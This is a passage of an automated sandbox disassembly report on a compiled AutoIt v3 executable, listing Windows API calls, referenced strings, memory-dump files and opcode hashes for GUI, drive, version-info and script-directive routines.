                                                                                                                      • Part of subcall function 003AA8CA: GetSysColorBrush.USER32(0000000F), ref: 003AA91D
                                                                                                                      • Part of subcall function 003AA8CA: GetSysColor.USER32(0000000F), ref: 003AA928
                                                                                                                      • Part of subcall function 003AA8CA: GetSysColor.USER32(00000011), ref: 003AA945
                                                                                                                      • Part of subcall function 003AA8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 003AA953
                                                                                                                      • Part of subcall function 003AA8CA: SelectObject.GDI32(?,00000000), ref: 003AA964
                                                                                                                      • Part of subcall function 003AA8CA: SetBkColor.GDI32(?,00000000), ref: 003AA96D
                                                                                                                      • Part of subcall function 003AA8CA: SelectObject.GDI32(?,?), ref: 003AA97A
                                                                                                                      • Part of subcall function 003AA8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 003AA999
                                                                                                                      • Part of subcall function 003AA8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 003AA9B0
                                                                                                                      • Part of subcall function 003AA8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 003AA9C5
                                                                                                                      • Part of subcall function 003AA8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 003AA9ED
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3521893082-0
                                                                                                                    • Opcode ID: 303550e29727bbd60a0be79c4a409f29f00a35cd37af721c449ff80cf7e36087
                                                                                                                    • Instruction ID: 226833c737d51d5437baa671e57d0d9f2f6845cf1a8cbb9b1e97bdf50c753d5d
                                                                                                                    • Opcode Fuzzy Hash: 303550e29727bbd60a0be79c4a409f29f00a35cd37af721c449ff80cf7e36087
                                                                                                                    • Instruction Fuzzy Hash: 04916C72408701FFC7129FA4DC08A5BBBADFF8A321F144B29F9A2961A0D771D945CB52
                                                                                                                    APIs
                                                                                                                    • DestroyWindow.USER32(00000000), ref: 003974DE
                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0039759D
                                                                                                                    • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 003975DB
                                                                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 003975ED
                                                                                                                    • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00397633
                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 0039763F
                                                                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00397683
                                                                                                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00397692
                                                                                                                    • GetStockObject.GDI32(00000011), ref: 003976A2
                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 003976A6
                                                                                                                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 003976B6
                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 003976BF
                                                                                                                    • DeleteDC.GDI32(00000000), ref: 003976C8
                                                                                                                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 003976F4
                                                                                                                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 0039770B
                                                                                                                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00397746
                                                                                                                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0039775A
                                                                                                                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 0039776B
                                                                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0039779B
                                                                                                                    • GetStockObject.GDI32(00000011), ref: 003977A6
                                                                                                                    • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 003977B1
                                                                                                                    • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 003977BB
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                    • API String ID: 2910397461-517079104
                                                                                                                    • Opcode ID: fbef2ae39b591f23eb82320efdce101ce1a8f0c7b44da4c19cc79400868e33a6
                                                                                                                    • Instruction ID: a23e0a1f4d78025b00ce424efeedfebbf421b1c2158c9b0b62696c084aab9310
                                                                                                                    • Opcode Fuzzy Hash: fbef2ae39b591f23eb82320efdce101ce1a8f0c7b44da4c19cc79400868e33a6
                                                                                                                    • Instruction Fuzzy Hash: 73A18171A50615BFEB25DBA4DC4AFAE7BBDEB09714F004215FA15AB2E0C770AD00CB64
                                                                                                                    APIs
                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0038AD1E
                                                                                                                    • GetDriveTypeW.KERNEL32(?,003AFAC0,?,\\.\,003AF910), ref: 0038ADFB
                                                                                                                    • SetErrorMode.KERNEL32(00000000,003AFAC0,?,\\.\,003AF910), ref: 0038AF59
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorMode$DriveType
                                                                                                                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                    • API String ID: 2907320926-4222207086
                                                                                                                    • Opcode ID: 87c267aa8d3944d5e371474d4b75dd1b8916597e90c2fed9ef4a3a41a6945805
                                                                                                                    • Instruction ID: 6269cfc664f9f93c284244b49eb12b0f08ae2c8511a383247189970ed4585997
                                                                                                                    • Opcode Fuzzy Hash: 87c267aa8d3944d5e371474d4b75dd1b8916597e90c2fed9ef4a3a41a6945805
                                                                                                                    • Instruction Fuzzy Hash: 3251C0B1648B05AB9B13FB24DD92CFD73A4EB49700B2044D7F507AB790DAB0AE01DB42
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __wcsnicmp
                                                                                                                    • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                    • API String ID: 1038674560-86951937
                                                                                                                    • Opcode ID: bb862fbaf61e56a8b3d8bea2d27f7ecf9518c3aa120332c79b34bc3de3773f79
                                                                                                                    • Instruction ID: 54fee7254df5f8f3e66012060a074129828afaf75c4cfd95339e7bc91d0a02b4
                                                                                                                    • Opcode Fuzzy Hash: bb862fbaf61e56a8b3d8bea2d27f7ecf9518c3aa120332c79b34bc3de3773f79
                                                                                                                    • Instruction Fuzzy Hash: CC81E7B16002256ACB27AB61FC43FAF37A8AF15700F044025FD45AF196EB71EE45C6A1
                                                                                                                    APIs
                                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 003A9AD2
                                                                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 003A9B8B
                                                                                                                    • SendMessageW.USER32(?,00001102,00000002,?), ref: 003A9BA7
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Window
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 2326795674-4108050209
                                                                                                                    • Opcode ID: a16b9d193d53c8f841b835f0ca4423c746f2306d58b66dcc69d89c2177f14bf9
                                                                                                                    • Instruction ID: c22c7278a34a971cfd221fb9b579d792c16808a6f2ac1e367defeaabacff1232
                                                                                                                    • Opcode Fuzzy Hash: a16b9d193d53c8f841b835f0ca4423c746f2306d58b66dcc69d89c2177f14bf9
                                                                                                                    • Instruction Fuzzy Hash: 7102C131108341AFDB26CF14CC49BAABBE9FF8A314F04862EF995E62A1C735D944CB51
                                                                                                                    APIs
                                                                                                                    • GetSysColor.USER32(00000012), ref: 003AA903
                                                                                                                    • SetTextColor.GDI32(?,?), ref: 003AA907
                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 003AA91D
                                                                                                                    • GetSysColor.USER32(0000000F), ref: 003AA928
                                                                                                                    • CreateSolidBrush.GDI32(?), ref: 003AA92D
                                                                                                                    • GetSysColor.USER32(00000011), ref: 003AA945
                                                                                                                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 003AA953
                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 003AA964
                                                                                                                    • SetBkColor.GDI32(?,00000000), ref: 003AA96D
                                                                                                                    • SelectObject.GDI32(?,?), ref: 003AA97A
                                                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 003AA999
                                                                                                                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 003AA9B0
                                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 003AA9C5
                                                                                                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 003AA9ED
                                                                                                                    • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 003AAA14
                                                                                                                    • InflateRect.USER32(?,000000FD,000000FD), ref: 003AAA32
                                                                                                                    • DrawFocusRect.USER32(?,?), ref: 003AAA3D
                                                                                                                    • GetSysColor.USER32(00000011), ref: 003AAA4B
                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 003AAA53
                                                                                                                    • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 003AAA67
                                                                                                                    • SelectObject.GDI32(?,003AA5FA), ref: 003AAA7E
                                                                                                                    • DeleteObject.GDI32(?), ref: 003AAA89
                                                                                                                    • SelectObject.GDI32(?,?), ref: 003AAA8F
                                                                                                                    • DeleteObject.GDI32(?), ref: 003AAA94
                                                                                                                    • SetTextColor.GDI32(?,?), ref: 003AAA9A
                                                                                                                    • SetBkColor.GDI32(?,?), ref: 003AAAA4
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1996641542-0
                                                                                                                    • Opcode ID: e78256260d4c83d42c1909b77cd5539860e6ad0f15045fdfd8e9d4ee76395cfd
                                                                                                                    • Instruction ID: 95e5aca4ed1d087e9d7029c20d7be18d5735e4ecb658e485b24294398f5640f1
                                                                                                                    • Opcode Fuzzy Hash: e78256260d4c83d42c1909b77cd5539860e6ad0f15045fdfd8e9d4ee76395cfd
                                                                                                                    • Instruction Fuzzy Hash: E0512D72900608FFDB129FA4DC48EAE7BBDEF4A320F114625F911AB2A1D7759940DF90
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 003A8AC1
                                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003A8AD2
                                                                                                                    • CharNextW.USER32(0000014E), ref: 003A8B01
                                                                                                                    • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 003A8B42
                                                                                                                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 003A8B58
                                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003A8B69
                                                                                                                    • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 003A8B86
                                                                                                                    • SetWindowTextW.USER32(?,0000014E), ref: 003A8BD8
                                                                                                                    • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 003A8BEE
                                                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 003A8C1F
                                                                                                                    • _memset.LIBCMT ref: 003A8C44
                                                                                                                    • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 003A8C8D
                                                                                                                    • _memset.LIBCMT ref: 003A8CEC
                                                                                                                    • SendMessageW.USER32(?,00001053,000000FF,?), ref: 003A8D16
                                                                                                                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 003A8D6E
                                                                                                                    • SendMessageW.USER32(?,0000133D,?,?), ref: 003A8E1B
                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 003A8E3D
                                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 003A8E87
                                                                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 003A8EB4
                                                                                                                    • DrawMenuBar.USER32(?), ref: 003A8EC3
                                                                                                                    • SetWindowTextW.USER32(?,0000014E), ref: 003A8EEB
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 1073566785-4108050209
                                                                                                                    • Opcode ID: bcb3a0622fafd5148fee1be4226c0f9ea321664d3df654fd041d8f6b21357574
                                                                                                                    • Instruction ID: d3b5d47a1fcc25c86e0a4a652e45d189e5cf75bb8c58424854ab3daef3c6656a
                                                                                                                    • Opcode Fuzzy Hash: bcb3a0622fafd5148fee1be4226c0f9ea321664d3df654fd041d8f6b21357574
                                                                                                                    • Instruction Fuzzy Hash: 3EE18171900219AFDF22DF64CC84EEE7BBDEF0A710F158156F915AA190DB749A80DF60
                                                                                                                    APIs
                                                                                                                    • GetCursorPos.USER32(?), ref: 003A49CA
                                                                                                                    • GetDesktopWindow.USER32 ref: 003A49DF
                                                                                                                    • GetWindowRect.USER32(00000000), ref: 003A49E6
                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 003A4A48
                                                                                                                    • DestroyWindow.USER32(?), ref: 003A4A74
                                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 003A4A9D
                                                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 003A4ABB
                                                                                                                    • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 003A4AE1
                                                                                                                    • SendMessageW.USER32(?,00000421,?,?), ref: 003A4AF6
                                                                                                                    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 003A4B09
                                                                                                                    • IsWindowVisible.USER32(?), ref: 003A4B29
                                                                                                                    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 003A4B44
                                                                                                                    • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 003A4B58
                                                                                                                    • GetWindowRect.USER32(?,?), ref: 003A4B70
                                                                                                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 003A4B96
                                                                                                                    • GetMonitorInfoW.USER32(00000000,?), ref: 003A4BB0
                                                                                                                    • CopyRect.USER32(?,?), ref: 003A4BC7
                                                                                                                    • SendMessageW.USER32(?,00000412,00000000), ref: 003A4C32
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                    • String ID: ($0$tooltips_class32
                                                                                                                    • API String ID: 698492251-4156429822
                                                                                                                    • Opcode ID: a332e89ce2b6741179191e72d43beb6a5fca447b9a139a2c47d6cb237997a7b5
                                                                                                                    • Instruction ID: 147484088824510e9c227f71df803b318203fd2b44385c679428f7f4aa1d1033
                                                                                                                    • Opcode Fuzzy Hash: a332e89ce2b6741179191e72d43beb6a5fca447b9a139a2c47d6cb237997a7b5
                                                                                                                    • Instruction Fuzzy Hash: 98B18A71604350AFDB05DF64D844B6ABBE8FF8A310F008A1DF9999B2A1D7B1E805CB95
                                                                                                                    APIs
                                                                                                                    • GetFileVersionInfoSizeW.VERSION(?,?), ref: 003844AC
                                                                                                                    • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 003844D2
                                                                                                                    • _wcscpy.LIBCMT ref: 00384500
                                                                                                                    • _wcscmp.LIBCMT ref: 0038450B
                                                                                                                    • _wcscat.LIBCMT ref: 00384521
                                                                                                                    • _wcsstr.LIBCMT ref: 0038452C
                                                                                                                    • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00384548
                                                                                                                    • _wcscat.LIBCMT ref: 00384591
                                                                                                                    • _wcscat.LIBCMT ref: 00384598
                                                                                                                    • _wcsncpy.LIBCMT ref: 003845C3
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                                                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                    • API String ID: 699586101-1459072770
                                                                                                                    • Opcode ID: cfcaafa6965494d4800a7bb3985600c6266660f6184f206a24ba191e73d05e38
                                                                                                                    • Instruction ID: 10004b575c49d644b0bb7c975436ec1793dce80db54754f0f8eba1491c614aee
                                                                                                                    • Opcode Fuzzy Hash: cfcaafa6965494d4800a7bb3985600c6266660f6184f206a24ba191e73d05e38
                                                                                                                    • Instruction Fuzzy Hash: 9741D772A003017ADB17BBB59C47EFF77ACDF42710F04006AF905EE182EA35AA0187A5
                                                                                                                    APIs
                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 003228BC
                                                                                                                    • GetSystemMetrics.USER32(00000007), ref: 003228C4
                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 003228EF
                                                                                                                    • GetSystemMetrics.USER32(00000008), ref: 003228F7
                                                                                                                    • GetSystemMetrics.USER32(00000004), ref: 0032291C
                                                                                                                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00322939
                                                                                                                    • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00322949
                                                                                                                    • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0032297C
                                                                                                                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00322990
                                                                                                                    • GetClientRect.USER32(00000000,000000FF), ref: 003229AE
                                                                                                                    • GetStockObject.GDI32(00000011), ref: 003229CA
                                                                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 003229D5
                                                                                                                      • Part of subcall function 00322344: GetCursorPos.USER32(?), ref: 00322357
                                                                                                                      • Part of subcall function 00322344: ScreenToClient.USER32(003E57B0,?), ref: 00322374
                                                                                                                      • Part of subcall function 00322344: GetAsyncKeyState.USER32(00000001), ref: 00322399
                                                                                                                      • Part of subcall function 00322344: GetAsyncKeyState.USER32(00000002), ref: 003223A7
                                                                                                                    • SetTimer.USER32(00000000,00000000,00000028,00321256), ref: 003229FC
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                    • String ID: AutoIt v3 GUI
                                                                                                                    • API String ID: 1458621304-248962490
                                                                                                                    • Opcode ID: 8500943e7ad3ce17fdff65ab0df81eca06d315f4ac2d9dbf558ebfe7b3e5b65b
                                                                                                                    • Instruction ID: fc40df328b7f742a1ee3e8b01271cb700f254e4765c36499082f3029e786d581
                                                                                                                    • Opcode Fuzzy Hash: 8500943e7ad3ce17fdff65ab0df81eca06d315f4ac2d9dbf558ebfe7b3e5b65b
                                                                                                                    • Instruction Fuzzy Hash: 2FB18171A00219EFDB16DFA8DC45BAE7BB8FB08315F114229FA15AB2E0DB74D850CB50
                                                                                                                    APIs
                                                                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 0037A47A
                                                                                                                    • __swprintf.LIBCMT ref: 0037A51B
                                                                                                                    • _wcscmp.LIBCMT ref: 0037A52E
                                                                                                                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0037A583
                                                                                                                    • _wcscmp.LIBCMT ref: 0037A5BF
                                                                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 0037A5F6
                                                                                                                    • GetDlgCtrlID.USER32(?), ref: 0037A648
                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0037A67E
                                                                                                                    • GetParent.USER32(?), ref: 0037A69C
                                                                                                                    • ScreenToClient.USER32(00000000), ref: 0037A6A3
                                                                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 0037A71D
                                                                                                                    • _wcscmp.LIBCMT ref: 0037A731
                                                                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 0037A757
                                                                                                                    • _wcscmp.LIBCMT ref: 0037A76B
                                                                                                                      • Part of subcall function 0034362C: _iswctype.LIBCMT ref: 00343634
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
